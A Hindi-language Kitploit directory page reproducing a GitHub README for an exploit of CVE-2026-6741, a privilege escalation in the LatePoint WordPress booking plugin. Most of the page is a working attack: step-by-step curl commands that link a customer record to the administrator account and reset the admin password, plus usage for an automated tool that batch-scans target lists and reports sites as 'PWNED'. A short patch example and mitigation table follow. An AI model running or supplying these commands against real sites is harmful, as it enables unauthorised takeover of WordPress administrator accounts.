Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-6741 — CVE-2026-6741 LatePoint – Calendar Booking प्लगइन में CVSS 8.8 (उच्च) प्रमाणित (एजेंट+) विशेषाधिकार वृद्धि कमजोरी है | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2026-6741
विशेषाधिकार वृद्धिभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubxxconi/cve-2026-6741

CVE-2026-6741

CVE-2026-6741 LatePoint – Calendar Booking प्लगइन में CVSS 8.8 (उच्च) प्रमाणित (एजेंट+) विशेषाधिकार वृद्धि कमजोरी है

रिपॉजिटरी देखें
33 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-6741

CVE-2026-6741, CVSS 8.8 (उच्च) स्तर की एक प्रमाणित (एजेंट+) विशेषाधिकार वृद्धि (प्रिविलेज एस्केलेशन) भेद्यता है, जो LatePoint – कैलेंडर बुकिंग प्लगइन में पाई गई है।

CVE-2026-6741 — LatePoint विशेषाधिकार वृद्धि स्कैनर

प्लगइन: LatePoint – कैलेंडर बुकिंग प्लगइन फॉर अपॉइंटमेंट्स एंड इवेंट्स (latepoint) CVE ID: CVE-2026-6741 CVSS स्कोर: 8.8 (उच्च) CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H भेद्यता प्रकार: प्रमाणित (एजेंट+) विशेषाधिकार वृद्धि → एडमिनिस्ट्रेटर अधिग्रहण प्रभावित संस्करण: <= 5.4.1 पैचयुक्त संस्करण: 5.4.2 प्रकाशन तिथि: 27 अप्रैल 2026 शोधकर्ता: skyv3il (AI SAFE), Chirita Catalin-Andrei / CC99IE (UVT-CTF), AmonRa — Wordfence


📌 भेद्यता के बारे में

latepoint_agent भूमिका वाला एक प्रमाणित हमलावर, किसी भी LatePoint ग्राहक रिकॉर्ड को WordPress व्यवस्थापक खाते से जोड़ सकता है और फिर LatePoint के स्वयं के पासवर्ड रीसेट प्रवाह का उपयोग करके व्यवस्थापक का पासवर्ड बदल सकता है।

इसका परिणाम पूर्ण साइट अधिग्रहण होता है।


🔍 भेद्यता सारांश


⚙️ तकनीकी विश्लेषण

WordPress Abilities API

LatePoint 5.3.0 ने WordPress 6.9+ के साथ आने वाले Abilities API समर्थन को जोड़ा। यह API प्लगइन्स को REST API पर कॉल करने योग्य "ability" वर्गों को पंजीकृत करने की अनुमति देता है:

root@kitploit:~
// latepoint.php (5.4.1, line 907)
if ( function_exists( 'wp_register_ability' ) ) {
    include_once LATEPOINT_ABSPATH . 'lib/abilities/class-latepoint-abilities.php';
}

भेद्यता युक्त कोड पथ

1 — क्षमता परिभाषा (लापता भूमिका जांच)

root@kitploit:~
// lib/abilities/customers/connect-customer-to-wp-user.php — line 12
protected function configure(): void {
    $this->id         = 'latepoint/connect-customer-to-wp-user';
    $this->label      = __( 'Connect customer to WP user', 'latepoint' );
    $this->permission = 'customer__edit';   // ← एकमात्र नियंत्रण: यह क्षमता
}

एजेंट भूमिका में डिफ़ॉल्ट रूप से customer__edit क्षमता होती है:

root@kitploit:~
// lib/helpers/roles_helper.php — line 401
public static function get_default_capabilities_list_for_agent_role() {
    $capabilities = [
        ...
        'customer__edit',   // ← एजेंट के पास यह क्षमता है
        ...
    ];
}

2 — execute() — भूमिका जांच नहीं

root@kitploit:~
// connect-customer-to-wp-user.php — lines 39–60
public function execute( array $args ) {
    $customer   = new OsCustomerModel( (int) $args['customer_id'] );
    $wp_user_id = (int) $args['wp_user_id'];

    if ( ! get_userdata( $wp_user_id ) ) {
        // केवल उपयोगकर्ता के अस्तित्व की जाँच की जा रही है
        // लापता: लक्ष्य उपयोगकर्ता की भूमिका की जाँच नहीं की गई
        return new WP_Error( 'wp_user_not_found', ... );
    }

    $customer->wordpress_user_id = $wp_user_id;  // ← किसी भी WP उपयोगकर्ता से जोड़ें
    $customer->save();

    return $this->serialize_customer( ... );
}

3 — पासवर्ड रीसेट श्रृंखला

root@kitploit:~
// lib/models/customer_model.php — line 315
public function update_password( $password ) {
    if ( OsAuthHelper::can_wp_users_login_as_customers()
         && $this->wordpress_user_id ) {
        wp_set_password( $password, $this->wordpress_user_id );
        // ↑ wordpress_user_id अब व्यवस्थापक आईडी है → व्यवस्थापक का पासवर्ड बदल जाता है
    }
}

मौजूदा नियंत्रण अपर्याप्त क्यों हैं?

root@kitploit:~
// LatePointAbstractAbility — check_permission()
public function check_permission(): bool {
    return OsRolesHelper::can_user( $this->permission );
    // केवल कॉल करने वाले की क्षमता की जाँच करता है
    // लक्ष्य उपयोगकर्ता की भूमिका की जाँच नहीं करता
}

🔴 हमला श्रृंखला

root@kitploit:~
latepoint_agent खाता
        │
        ▼
1. एजेंट के रूप में WP में लॉगिन करें → REST nonce प्राप्त करें
        │
        ▼
2. लक्ष्य व्यवस्थापक WordPress उपयोगकर्ता आईडी पता करें
   (wp-json/wp/v2/users या ID=1)
        │
        ▼
3. POST /wp-json/wp/v2/abilities/latepoint/connect-customer-to-wp-user
   { "customer_id": 5, "wp_user_id": 1 }
   → भूमिका जांच नहीं → सफल
        │
        ▼
4. LatePoint forgot_password → ग्राहक ईमेल पर रीसेट टोकन भेजें
        │
        ▼
5. टोकन के साथ change_password → update_password() कॉल होता है
   → wp_set_password("Hacked!", 1)
   → व्यवस्थापक पासवर्ड बदल गया
        │
        ▼
6. नए पासवर्ड से व्यवस्थापक के रूप में लॉगिन → पूर्ण साइट नियंत्रण ✓

🧪 प्रूफ ऑफ कॉन्सेप्ट (मैन्युअल)

⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

पूर्व शर्तें:

  • WordPress 6.9+ (Abilities API आवश्यक)
  • LatePoint <= 5.4.1 स्थापित और सक्रिय
  • latepoint_agent भूमिका वाला खाता
  • नियंत्रित LatePoint ग्राहक रिकॉर्ड

चरण 1 — एजेंट लॉगिन + REST Nonce

root@kitploit:~
WP_URL="https://target.example.com"
AGENT_USER="agent_user"
AGENT_PASS="agent_password"

# कुकी-आधारित सत्र खोलें
curl -c cookies.txt -b cookies.txt -s -X POST "$WP_URL/wp-login.php" \
  -d "log=$AGENT_USER&pwd=$AGENT_PASS&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
  -H "Cookie: wordpress_test_cookie=WP+Cookie+check"

# REST nonce प्राप्त करें
NONCE=$(curl -s -b cookies.txt \
  "$WP_URL/wp-admin/admin-ajax.php?action=rest-nonce")
echo "Nonce: $NONCE"

चरण 2 — व्यवस्थापक उपयोगकर्ता आईडी पता करें

root@kitploit:~
# REST API से व्यवस्थापक उपयोगकर्ताओं की सूची प्राप्त करें
curl -s "$WP_URL/wp-json/wp/v2/users?roles=administrator" \
  -H "X-WP-Nonce: $NONCE" | python3 -m json.tool

ADMIN_WP_USER_ID=1   # सामान्यतः ID=1

चरण 3 — ग्राहक → व्यवस्थापक जोड़ें (भेद्यता)

root@kitploit:~
CUSTOMER_ID=5   # आपके नियंत्रण वाली LatePoint ग्राहक आईडी

curl -s -b cookies.txt -X POST \
  "$WP_URL/wp-json/wp/v2/abilities/latepoint/connect-customer-to-wp-user" \
  -H "Content-Type: application/json" \
  -H "X-WP-Nonce: $NONCE" \
  -d "{\"customer_id\": $CUSTOMER_ID, \"wp_user_id\": $ADMIN_WP_USER_ID}"

अपेक्षित प्रतिक्रिया:

root@kitploit:~
{
  "id": 5,
  "wp_user_id": 1,
  "email": "[email protected]"
}

चरण 4 — पासवर्ड रीसेट शुरू करें

root@kitploit:~
CUSTOMER_EMAIL="[email protected]"

curl -s -X POST \
  "$WP_URL/?latepoint_route=customer_cabinet%2Fforgot_password" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "password_reset_email=$CUSTOMER_EMAIL"

LatePoint, $CUSTOMER_EMAIL पते पर account_nonce टोकन युक्त एक रीसेट ईमेल भेजता है।


चरण 5 — पासवर्ड बदलें

root@kitploit:~
RESET_TOKEN="<ईमेल से प्राप्त टोकन>"
NEW_PASSWORD="Attacker_Password123!"

curl -s -X POST \
  "$WP_URL/?latepoint_route=customer_cabinet%2Fchange_password" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "password_reset_token=$RESET_TOKEN&password=$NEW_PASSWORD&password_confirmation=$NEW_PASSWORD"

यह कॉल update_password() → wp_set_password($NEW_PASSWORD, 1) श्रृंखला को सक्रिय करता है। व्यवस्थापक पासवर्ड बदल गया।


चरण 6 — व्यवस्थापक के रूप में लॉगिन करें

root@kitploit:~
curl -c admin_cookies.txt -b admin_cookies.txt -s -X POST \
  "$WP_URL/wp-login.php" \
  -d "log=admin&pwd=$NEW_PASSWORD&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \
  -H "Cookie: wordpress_test_cookie=WP+Cookie+check"

सत्यापन

root@kitploit:~
# wp-admin तक पहुंच
curl -b admin_cookies.txt "$WP_URL/wp-admin/user-new.php"
# अपेक्षित: 200 OK (wp-login.php पर रीडायरेक्ट नहीं)

# REST API से भूमिका सत्यापन
ADMIN_NONCE=$(curl -s -b admin_cookies.txt \
  "$WP_URL/wp-admin/admin-ajax.php?action=rest-nonce")

curl -s "$WP_URL/wp-json/wp/v2/users/me" \
  -H "X-WP-Nonce: $ADMIN_NONCE" | python3 -m json.tool
# अपेक्षित: "roles": ["administrator"]

🛠️ स्वचालित स्कैनर

स्थापना

root@kitploit:~
git clone https://github.com/kullanici/cve-2026-6741-scanner
cd cve-2026-6741-scanner
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests

🚀 उपयोग

एकल लक्ष्य — पूर्णतः स्वचालित

root@kitploit:~
python latepoint_privesc.py -u http://hedef.com \
  --agent-user agent1 --agent-pass Pass123!

व्यवस्थापक आईडी और ग्राहक आईडी मैन्युअल रूप से निर्दिष्ट करें

root@kitploit:~
python latepoint_privesc.py -u http://hedef.com \
  --agent-user agent1 --agent-pass Pass123! \
  --admin-id 1 \
  --customer-id 5 \
  --customer-email [email protected]

चरण 2 — रीसेट टोकन के साथ पासवर्ड बदलें

root@kitploit:~
python latepoint_privesc.py -u http://hedef.com \
  --agent-user agent1 --agent-pass Pass123! \
  --admin-id 1 \
  --customer-id 5 \
  --customer-email [email protected] \
  --reset-token abc123xyz \
  --new-password Hacked_2026!

बैच स्कैन

root@kitploit:~
python latepoint_privesc.py -l targets.txt -t 10 \
  --agent-user agent1 --agent-pass Pass123! \
  -o sonuclar.txt

प्रॉक्सी के साथ (Burp Suite)

root@kitploit:~
python latepoint_privesc.py -u http://hedef.com \
  --agent-user agent1 --agent-pass Pass123! \
  --proxy http://127.0.0.1:8080

⚙️ पैरामीटर्स

सामान्य

एजेंट क्रेडेंशियल्स

पैरामीटरविवरण
--agent-userएजेंट उपयोगकर्ता नाम (अनिवार्य)
--agent-passएजेंट पासवर्ड (अनिवार्य)

लक्ष्य पैरामीटर्स

पैरामीटरविवरणडिफ़ॉल्ट
--admin-idलक्ष्य व्यवस्थापक WP उपयोगकर्ता आईडी

पासवर्ड रीसेट (चरण 2)

पैरामीटरविवरणडिफ़ॉल्ट
--reset-tokenईमेल से प्राप्त रीसेट टोकन—
--new-passwordनया व्यवस्थापक पासवर्डPwned_CVE2026_6741!

📊 स्कैनर आउटपुट स्थितियाँ


🖥️ नमूना स्कैनर आउटपुट

root@kitploit:~
[*] लक्ष्य         : http://hedef.com
[*] एजेंट         : agent1
[*] व्यवस्थापक आईडी      : स्वचालित पता लगाना
[*] ग्राहक आईडी   : स्वचालित पता लगाना
[*] रीसेट टोकन   : ईमेल की प्रतीक्षा है
[*] नया पासवर्ड    : Pwned_CVE2026_6741!

[→] http://hedef.com  चरण 1/6: एजेंट लॉगिन...
[→] http://hedef.com  चरण 2/6: व्यवस्थापक उपयोगकर्ता आईडी पता लगाना...
[→] http://hedef.com  चरण 3/6: ग्राहक आईडी पता लगाना...
[→] http://hedef.com  चरण 4/6: ग्राहक #5 → व्यवस्थापक #1 जोड़ा जा रहा है...
[→] http://hedef.com  चरण 5/6: पासवर्ड रीसेट शुरू किया जा रहा है...
[→] http://hedef.com  चरण 6/6: पासवर्ड बदला जा रहा है (मैन्युअल टोकन)...

════════════════════════════════════════════════════════════
[★ PWNED     ] http://hedef.com
  संस्करण       : 5.4.1
  व्यवस्थापक आईडी    : 1
  ग्राहक    : #5 <[email protected]>
  उपयोगकर्ता   : admin  roles=['administrator']
════════════════════════════════════════════════════════════

[+] सहेजा गया → privesc_results.txt

🔄 दो-चरणीय उपयोग प्रवाह

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  चरण 1 — जोड़ें + रीसेट ईमेल भेजें                    │
│                                                         │
│  python latepoint_privesc.py -u http://hedef.com \      │
│    --agent-user agent1 --agent-pass Pass123! \          │
│    --customer-id 5 --customer-email [email protected]   │
│                                                         │
│  → आउटपुट: "रीसेट ईमेल भेजा गया — टोकन की प्रतीक्षा है" │
└─────────────────────────┬───────────────────────────────┘
                           │
                  ईमेल से टोकन प्राप्त करें
                           │
┌─────────────────────────▼───────────────────────────────┐
│  चरण 2 — टोकन के साथ पासवर्ड बदलें                    │
│                                                         │
│  python latepoint_privesc.py -u http://hedef.com \      │
│    --agent-user agent1 --agent-pass Pass123! \          │
│    --customer-id 5 --customer-email [email protected] \ │
│    --reset-token abc123xyz \                            │
│    --new-password Hacked_2026!                          │
│                                                         │
│  → आउटपुट: ★ PWNED — roles=['administrator']           │
└─────────────────────────────────────────────────────────┘

🛡️ बचाव / पैच

सुरक्षित execute() उदाहरण:

root@kitploit:~
// असुरक्षित (मौजूदा — 5.4.1)
if ( ! get_userdata( $wp_user_id ) ) {
    return new WP_Error( 'wp_user_not_found', ... );
}

// सुरक्षित (अनुशंसित — 5.4.2+)
$target_user = get_userdata( $wp_user_id );
if ( ! $target_user ) {
    return new WP_Error( 'wp_user_not_found', ... );
}
// लक्ष्य उपयोगकर्ता की भूमिका जाँचें
if ( in_array( 'administrator', (array) $target_user->roles ) ) {
    return new WP_Error( 'forbidden', 'Cannot link customer to administrator.' );
}

📁 फ़ाइल संरचना

root@kitploit:~
cve-2026-6741-scanner/
├── latepoint_privesc.py   # मुख्य स्कैनर
├── requirements.txt       # निर्भरताएँ
└── README.md              # यह फ़ाइल

⚠️ कानूनी चेतावनी

यह उपकरण और PoC केवल अधिकृत प्रणालियों पर, शैक्षिक उद्देश्यों के लिए और पेनिट्रेशन टेस्टिंग के अंतर्गत उपयोग के लिए तैयार किया गया है। अनधिकृत प्रणालियों पर इसका उपयोग तुर्की दंड संहिता की धारा 243-245 और अंतरराष्ट्रीय साइबर अपराध कानूनों के अंतर्गत अपराध है। डेवलपर उपकरण के दुरुपयोग से उत्पन्न किसी भी कानूनी दायित्व को स्वीकार नहीं करता है।


📄 लाइसेंस

MIT लाइसेंस — केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए।


🔗 संदर्भ

  • Wordfence Advisory
  • WordPress Abilities API — WP 6.9
  • LatePoint Plugin Directory
  • CVSS 3.1 Calculator
  • CWE-269: Improper Privilege Management
टूल डाउनलोड करें
क्षेत्रमान
प्लगइन नामLatePoint – कैलेंडर बुकिंग प्लगइन
प्लगइन स्लगlatepoint
CVE IDCVE-2026-6741
CVSS स्कोर8.8 (उच्च)
भेद्यता प्रकारप्रमाणित (एजेंट+) विशेषाधिकार वृद्धि
प्रभावित संस्करण<= 5.4.1
पैचयुक्त संस्करण5.4.2
आवश्यकताlatepoint_agent भूमिका, WordPress 6.9+
पैरामीटरलघुविवरणडिफ़ॉल्ट
--url-uएकल लक्ष्य URL—
--list-lलक्ष्य सूची फ़ाइल—
--threads-tथ्रेड्स की संख्या5
--output-oआउटपुट फ़ाइलprivesc_results.txt
--proxy—प्रॉक्सी URL—
--timeout—अनुरोध टाइमआउट (सेकंड)10
--force—Abilities API का पता विफल होने पर भी जारी रखेंFalse
स्वचालित पता लगाना
--customer-idनियंत्रित LatePoint ग्राहक आईडीस्वचालित पता लगाना
--customer-emailLatePoint ग्राहक ईमेल पताएजेंट ईमेल
स्थितिविवरण
★ PWNEDव्यवस्थापक पासवर्ड बदल गया, सत्र खुल गया
~ RESET_SENTरीसेट ईमेल भेजा गया — टोकन की प्रतीक्षा है
~ PWD_CHANGEपासवर्ड बदल गया — व्यवस्थापक लॉगिन मैन्युअल रूप से सत्यापित करें
- LINK_FAILग्राहक-व्यवस्थापक जुड़ाव विफल
- LOGIN_FAILएजेंट लॉगिन विफल
- NO_PLUGINLatePoint स्थापित नहीं
- NO_ABILITYAbilities API बंद है (WP 6.9+ आवश्यक)
~ NO_CUSTग्राहक आईडी नहीं मिली — मैन्युअल रूप से निर्दिष्ट करें
~ UNREACHलक्ष्य तक नहीं पहुँचा जा सकता
उपायकार्यान्वयन
प्लगइन अपडेटLatePoint 5.4.2+ संस्करण में अपग्रेड करें
भूमिका जाँच जोड़ेंexecute() में लक्ष्य उपयोगकर्ता की भूमिका सत्यापित करें
Abilities API प्रतिबंधित करेंएजेंट भूमिका से connect-customer-to-wp-user क्षमता हटाएँ
पासवर्ड रीसेट सुरक्षाव्यवस्थापक खातों के लिए LatePoint रीसेट प्रवाह अक्षम करें
WP 6.9 Abilities ऑडिटपंजीकृत क्षमताओं की नियमित समीक्षा करें